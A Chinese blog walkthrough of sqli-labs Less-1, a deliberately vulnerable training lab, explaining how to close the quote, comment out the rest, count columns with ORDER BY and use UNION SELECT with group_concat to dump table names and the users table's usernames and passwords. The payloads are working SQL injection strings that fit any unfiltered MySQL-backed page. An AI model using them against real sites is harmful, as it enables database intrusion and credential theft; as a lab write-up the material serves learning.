sql注入sqli-labs第一关

news2025/10/31 16:05:21

目录

sql注入是什么?

sqli-labs第一关--字符型注入

思路:想要利用连表查询

进一步思考如何逃脱单引号

如何知道表的列数

最终目的:注入管理员账号密码

sql注入是什么?

        注入:都是合理合法的MySQL执行语句

        产生的原因:对于输入没有做过滤,导致意外的查询语句进到了程序中,查询出来了本不应

                                该查询的数据

sqli-labs第一关--字符型注入

less-1初步的理解

        没有任何障碍,没有过滤函数,简单的接收参数,查询数据库,然后展示到前端

        代码存在的问题:对于用户的输入没有做任何过滤

        MySQL连表查询:保证字段数的一致,创建临时表保证字段一致

建立一个商品表

更改相关代码

访问gid=1的信息

思路:想要利用连表查询

        如果直接输入1 union select 1,2,3   

        而代码中呈现的是  gid=' 1 union select 1,2,3 '

        由于数据库纠错机制会删掉后面的  'union select 1,2,3'  所以执行的还是gid='1'

思路结论:没有逃脱单引号的控制

进一步思考如何逃脱单引号

进行闭合单引号---->直白点就是加单引号的方式逃脱单引号

如果   输入 1' union select 1,2,3     代码呈现:gid='1' union select 1,2,3 '

        1、单引号成对出现

        2、多出的单引号的处理思路:a.将单引号闭合b.将单引号注释掉

尝试gid=' 1 ' # '

             urlencode地址传参#会进行编码    #未编码的原因

urlencode编码规范 先转ascli码再转16进制

#的urlencode编码是%23           

替换成%23  成功

单引号逃脱解决   

进行连表查询需要表的列数

如何知道表的列数

利用order by检测列数:输入 1' order by 1%23     

        --+ 也可以注释   

问题:而+和空格的关系

原因:当使用URLEncoder时,会发现字符串中的空格被转换成“+”号,如果编码后的内容入库后,

           将导致读取时,前段本来是空格的地方,会显示成“+”号字符。

           URLEncoder.encode方法是基于application/x-www-form-urlencoded MIME格式进行编码               的。这种编码方式最初是为了在HTML表单中提交数据而设计的。根据这种编码方式的规               定,空格字符会被替换为“+”号。

           这种替换的原因主要是出于简化编码和节省空间的考虑。在表单提交中,空格是非常常见               的 字符,而将其替换为“+”号可以有效地缩短编码后的字符串长度,减少数据传输量。

使用1' order by 4%23                                             代码中为gid='1' order by 4%23'

使用 1' order by 3%23                                                  代码中为gid='1' order by 3%23'

进而得出表的列数

尝试gid='1' union select 1,2,3--+'

  

没变化的原因是呈现只显示第一表

让第一个表为空    gid为没有的值

gid='11' union select 1,2,3--+'

而2,3可以替换成mysql查询的库和用户

gid='1111' union select 1,user(),database()--+'

得到当前的用户和数据库名

最终目的:注入管理员账号密码

在MySQL上的思路

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
| sys                |
+--------------------+
mysql> desc tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field           | Type                | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG   | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA    | varchar(64)         | NO   |     |         |       |
| TABLE_NAME      | varchar(64)         | NO   |     |         |       |
| TABLE_TYPE      | varchar(64)         | NO   |     |         |       |
| ENGINE          | varchar(64)         | YES  |     | NULL    |       |
| VERSION         | bigint(21) unsigned | YES  |     | NULL    |       |
| ROW_FORMAT      | varchar(10)         | YES  |     | NULL    |       |
| TABLE_ROWS      | bigint(21) unsigned | YES  |     | NULL    |       |
| AVG_ROW_LENGTH  | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_LENGTH     | bigint(21) unsigned | YES  |     | NULL    |       |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| INDEX_LENGTH    | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_FREE       | bigint(21) unsigned | YES  |     | NULL    |       |
| AUTO_INCREMENT  | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_TIME     | datetime            | YES  |     | NULL    |       |
| UPDATE_TIME     | datetime            | YES  |     | NULL    |       |
| CHECK_TIME      | datetime            | YES  |     | NULL    |       |
| TABLE_COLLATION | varchar(32)         | YES  |     | NULL    |       |
| CHECKSUM        | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_OPTIONS  | varchar(255)        | YES  |     | NULL    |       |
| TABLE_COMMENT   | varchar(2048)       | NO   |     |         |       |
+-----------------+---------------------+------+-----+---------+-------+
mysql> select table_name from tables where table_schema='security';
+------------+
| table_name |
+------------+
| emails     |
| goods      |
| referers   |
| uagents    |
| users      |
+------------+
mysql> select column_name from columns where table_schema='security' and table_name='users';
+-------------+
| column_name |
+-------------+
| id          |
| username    |
| password    |
+-------------+
mysql> select username,password from security.users;
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+

利用group_concat()将查询结果连起来

-1'union select 1,2,group_concat(table_name) from information_schema.tables --+

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

-1' union select 1,2,group_concat(username ,id , password) from users--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1982767.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

PXE学习及其简单应用

PXE学习及其简单应用

一、PXE 的定义 PXE 是一种基于网络的启动技术,最初由 Intel 开发,旨在提供一种在没有本地存储设备的情况下通过网络启动操作系统的标准。PXE 集成在计算机的 BIOS 或 UEFI 中,允许计算机从网络服务器下载并启动操作系统或其他软件。 二、PX…
阅读更多...
C#学习笔记12:SYN6288语音模块_Winform上位机控制软件

C#学习笔记12:SYN6288语音模块_Winform上位机控制软件

今日尝试使用C# Winform写一个上位机软件控制 SYN6288语音模块 这里不讲什么基本原理(或者讲的比较略简),直接讲实现了就...... 文章提供测试代码讲解、测试效果图、整体测试工程下载 目录 控件的摆放: SYN6288介绍: 代码编程: 对16进制发送…
阅读更多...
一款绿色免费免安装的hosts文件编辑器

一款绿色免费免安装的hosts文件编辑器

BlueLife Hosts Editor 是一款免费的 Hosts 文件编辑工具,主要用于管理和修改电脑系统的 Hosts 文件。该软件具有多种功能,包括添加、删除和更新域名记录,以及调整 IP 与网域名称的交叉对应关系,类似于 DNS 的功能。 该软件特别适…
阅读更多...
鸿蒙应用服务开发【华为账号服务】

鸿蒙应用服务开发【华为账号服务】

Account Kit 介绍 本示例展示了使用Account Kit提供的登录、授权头像昵称、实时验证手机号、收货地址、发票抬头、未成年人模式的能力。 本示例模拟了在应用里,调用一键登录Button组件拉起符合华为规范的登录页面;调用获取头像昵称接口获取头像昵称&a…
阅读更多...
七天打造一套量化交易系统:Day8-阶段性总结、未完待续...

七天打造一套量化交易系统:Day8-阶段性总结、未完待续...

七天打造一套量化交易系统:Day8-阶段性总结、未完待续... 阅读数据分析私信情况汇总如何收费代写策略功能拓展商务合作如何联系我 下一阶段规划 从 2024-07-18 准备进行【七天打造一套量化交易系统】系列分享,到昨天(2024-08-04)&…
阅读更多...
【Kubernetes】k8s集群的pod基础

【Kubernetes】k8s集群的pod基础

目录 一.Pod概述 1.什么是pod 2.k8s中pod的两种使用方式 3.pod容器的常规使用流程 4.创建pod的3种方式 二.Pod中容器概述 1.容器分类 2.Pod容器的3种镜像拉取策略 3.Pod容器的3种重启策略 4.pod的dns策略 一.Pod概述 1.什么是pod Pod是kubernetes中最小的资源管理组…
阅读更多...
登录相关功能的优化【JWT令牌+拦截器+跨域】

登录相关功能的优化【JWT令牌+拦截器+跨域】

登录相关功能的优化 登录后显示当前登录用户el-dropdown: Element - The worlds most popular Vue UI framework <el-dropdown style"float: right; height: 60px; line-height: 60px"><span class"el-dropdown-link" style"color: white;…
阅读更多...
【香橙派系列教程】(八)一小时速通Python

【香橙派系列教程】(八)一小时速通Python

【八】一小时速通Python 本章内容服务于香橙派下的开发&#xff0c;用C语言的视角来学习即可&#xff0c;会改就行。 详细说明&#xff0c;请看链接:python全篇教学 Python是一种动态解释型的编程语言&#xff0c;Python可以在Windows、UNIX、MAC等多种操作系统上 使用&…
阅读更多...
codetop标签双指针题目大全解析(C++解法),双指针刷穿地心!!!

codetop标签双指针题目大全解析(C++解法),双指针刷穿地心!!!

写在前面&#xff1a;此篇博客是以[双指针总结]博客为基础的针对性训练&#xff0c;题源是codetop标签双指针近一年&#xff0c;频率由高到低 1.无重复字符的最长子串2.三数之和3.环形链表4.合并两个有序数组5.接雨水6.环形链表II7.删除链表的倒数第N个节点8.训练计划II9.最小覆…
阅读更多...
SMU Summer 2024 div2 4th

SMU Summer 2024 div2 4th

文章目录 The Fourth Week一、前言二、算法1.最近公共祖先lca倍增算法2.Dijkstra算法<1>&#xff08;游戏&#xff09; 3.拓扑排序3. Bellman-Ford算法4. SPFA算法 三、总结 The Fourth Week 不须计较苦劳心&#xff0c;万事原来有命。 ————宋朱敦儒《西江月世事短如…
阅读更多...
大模型岗位面试总结,靠它轻松拿下offer

大模型岗位面试总结,靠它轻松拿下offer

节前技术群邀请了一些参加大模型面试&#xff08;含实习&#xff09;的同学&#xff0c;分享他们面试算法工程师(大模型方向)的宝贵经验。 之前总结链接如下&#xff1a; 超全总结&#xff01;大模型算法岗面试真题来了&#xff01; 面了 5 家知名企业的NLP算法岗(大模型方向…
阅读更多...
计算机组成原理(1):计算机系统概述

计算机组成原理(1):计算机系统概述

计算机底层和计算机原理&#xff01;&#xff01;&#xff01;&#xff01; 研究计算机硬件在底层是怎末运行的&#xff01; 计算机硬件能识别的数据 用低电平表示0 用高电平表示1 皮卡丘使高电压&#xff01; 计算机传递数据是用的电信号&#xff01;&#xff01;&#xff…
阅读更多...
云原生-搭建dhcp服务并测试kickstart脚本

云原生-搭建dhcp服务并测试kickstart脚本

# 安装DHCP服务 【为其他服务器提供分配ip地址的功能&#xff0c;前提是其他服务器网卡必须设置成DHCP获取IP地址模式】 [rootpxe ~]# yum install dhcp.x86_64 -y[rootpxe ~]# rpm -qc dhcp /etc/dhcp/dhcpd.conf[rootpxe -]# cat /etc/dhcp/dhcpd.conf## DHCP Server Configu…
阅读更多...
NLP论文阅读PALM

NLP论文阅读PALM

NLP论文阅读PALM 模型构成Joint Modeling of Autoencoding and AutoregressionInput&Output RepresentationsCopying Tokens from Context扩展词汇的分布复制分布最终分布 PALM: Pre-training an Autoencoding&Autoregressive Language Model for Context-conditioned …
阅读更多...
[flink]部署模式

[flink]部署模式

部署模式 在一些应用场景中&#xff0c;对于集群资源分配和占用的方式&#xff0c;可能会有特定的需求。 Flink为各种场景提供了不同的部署模式&#xff0c;主要有以下三种&#xff1a;会话模式&#xff08;Session Mode&#xff09;、单作业模式&#xff08;Per-Job Mode&…
阅读更多...
Linux系统驱动(四)自动创建设备节点

Linux系统驱动(四)自动创建设备节点

自动创建设备节点 &#xff08;一&#xff09;创建设备节点的机制 1. mknod 将驱动编译到内核中&#xff0c;在内核启动时驱动自动被安装执行 2.devfs&#xff08;2.4内核&#xff09; 3. udev&#xff08;2.6内核至今&#xff09; 注&#xff1a;hotplug — 热插拔 &…
阅读更多...
KamaCoder 101. 孤岛的总面积

KamaCoder 101. 孤岛的总面积

题目描述 给定一个由 1&#xff08;陆地&#xff09;和 0&#xff08;水&#xff09;组成的矩阵&#xff0c;岛屿指的是由水平或垂直方向上相邻的陆地单元格组成的区域&#xff0c;且完全被水域单元格包围。孤岛是那些位于矩阵内部、所有单元格都不接触边缘的岛屿。 现在你需…
阅读更多...
Bugku -----Web-----全题目解析 (二) 超详细步骤

Bugku -----Web-----全题目解析 (二) 超详细步骤

————————————————————分割线———————————————————— 6.矛盾 这一行从 URL 查询字符串中获取名为 num 的参数值&#xff0c;并将其赋值给 $num 变量。如果 URL 中没有提供 num 参数&#xff0c;或者参数值不是有效的字符串&#xff0c;则…
阅读更多...
Modbus-RTU详解

Modbus-RTU详解

目录 Modbus-RTU协议 帧结构示例 CRC16校验算法 CRC16算法的过程 modbus-rtu的使用 发送数据 接收数据 tcp网口完整实现modbus-rtu协议 使用NModbus4实现modbus-rtu协议 安装NModbus4库。 串口实现NModbus4 Modbus-RTU协议 Modbus RTU 协议是一种开放的串行协议&#xff0c;广…
阅读更多...
基于51单片机的无线模块PWM电机调速设计

基于51单片机的无线模块PWM电机调速设计

一、概述 为了实现对直流电机无极调速的需求&#xff0c;提出了一种基于STC 89C52微控制器的直流PWM可调速系统设计方案。根据系统所需达到的控制目的&#xff0c;UL2003驱动芯片作为电动机驱动电路&#xff0c;实现对电机的驱动。控制算法采用经典PWM脉宽调制算法作为控制策略…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023